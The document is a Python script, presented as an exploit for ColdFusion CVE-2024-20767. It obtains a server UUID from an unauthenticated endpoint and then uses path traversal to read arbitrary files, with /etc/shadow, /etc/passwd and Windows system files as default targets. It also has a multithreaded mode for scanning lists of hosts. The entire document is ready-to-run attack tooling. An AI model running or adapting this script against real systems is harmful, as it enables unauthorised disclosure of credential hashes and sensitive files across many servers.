1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import re
import urllib3
import requests
import argparse
from urllib.parse import urlparse
from concurrent.futures import ThreadPoolExecutor, as_completed
urllib3.disable_warnings()
class ColdFusionExploit:
def __init__(self, output_file=None, port=8500):
self.output_file = output_file
self.port = port
self.verbose = True
self.session = requests.Session()
def print_status(self, message, status="*"):
colors = {"+": "\033[92m", "-": "\033[91m", "*": "\033[94m", "!": "\033[93m"}
reset = "\033[0m"
print(f"{colors.get(status, '')}{status} {message}{reset}")
def normalize_url(self, url):
if not url.startswith(('http://', 'https://')):
url = f"http://{url}"
parsed = urlparse(url)
if not parsed.port:
url = f"{url}:{self.port}"
return url.rstrip('/')
def get_uuid(self, url):
endpoint = "/CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat"
try:
response = self.session.get(f"{url}{endpoint}", verify=False, timeout=10)
if response.status_code == 200:
match = re.search(r"<var name='uuid'><string>(.+?)</string></var>", response.text)
if match:
uuid = match.group(1)
if self.verbose:
self.print_status(f"UUID: {uuid[:8]}...", "+")
return uuid
except Exception as e:
if self.verbose:
self.print_status(f"Error: {e}", "-")
return None
def read_file(self, url, uuid, file_path):
headers = {"uuid": uuid}
endpoint = f"/pms?module=logging&file_name=../../../../../../../{file_path}&number_of_lines=100"
try:
response = self.session.get(f"{url}{endpoint}", verify=False, headers=headers, timeout=10)
if response.status_code == 200 and response.text.strip() != "[]":
return response.text
except:
pass
return None
def test_files(self, url, uuid):
files = {
"Linux": ["etc/passwd", "etc/shadow", "etc/hosts"],
"Windows": ["Windows/win.ini", "Windows/System32/drivers/etc/hosts", "boot.ini"]
}
for os_name, file_list in files.items():
for file_path in file_list:
content = self.read_file(url, uuid, file_path)
if content:
self.print_status(f"VULNERABLE: {url} - {os_name} - {file_path}", "+")
if self.verbose:
print(content[:200] + "..." if len(content) > 200 else content)
print("-" * 50)
if self.output_file:
with open(self.output_file, "a") as f:
f.write(f"{url} - {os_name} - {file_path}\n")
return True
return False
def exploit_custom_file(self, url, uuid, custom_file):
content = self.read_file(url, uuid, custom_file)
if content:
self.print_status(f"File read: {custom_file}", "+")
print(content)
return True
else:
self.print_status(f"Failed to read: {custom_file}", "-")
return False
def exploit(self, url, custom_file=None):
url = self.normalize_url(url)
if self.verbose:
self.print_status(f"Testing: {url}")
uuid = self.get_uuid(url)
if not uuid:
if self.verbose:
self.print_status(f"No UUID: {url}", "-")
return False
if custom_file:
return self.exploit_custom_file(url, uuid, custom_file)
else:
return self.test_files(url, uuid)
def scan_file(self, target_file, threads):
if not os.path.exists(target_file):
self.print_status(f"File not found: {target_file}", "-")
return
with open(target_file, "r") as f:
urls = [line.strip() for line in f if line.strip() and not line.startswith('#')]
self.print_status(f"Scanning {len(urls)} targets with {threads} threads")
self.verbose = False
vulnerable = 0
with ThreadPoolExecutor(max_workers=threads) as executor:
futures = {executor.submit(self.exploit, url): url for url in urls}
for future in as_completed(futures):
url = futures[future]
try:
if future.result():
vulnerable += 1
print(f"[+] {url}")
else:
print(f"[-] {url}")
except Exception as e:
print(f"[!] {url} - Error: {e}")
self.print_status(f"Scan complete: {vulnerable}/{len(urls)} vulnerable", "+")
def main():
parser = argparse.ArgumentParser(description="ColdFusion CVE-2024-20767 Exploit")
parser.add_argument("-u", "--url", help="Target URL")
parser.add_argument("-f", "--file", help="File with target URLs")
parser.add_argument("-p", "--port", type=int, default=8500, help="Port (default: 8500)")
parser.add_argument("-c", "--custom", help="Custom file to read")
parser.add_argument("-o", "--output", help="Output file")
parser.add_argument("-t", "--threads", type=int, default=20, help="Threads (default: 20)")
parser.add_argument("-q", "--quiet", action="store_true", help="Quiet mode")
args = parser.parse_args()
if not args.url and not args.file:
parser.print_help()
return
exploit = ColdFusionExploit(args.output, args.port)
exploit.verbose = not args.quiet
if args.url:
exploit.exploit(args.url, args.custom)
elif args.file:
exploit.scan_file(args.file, args.threads)
if __name__ == "__main__":
main()
|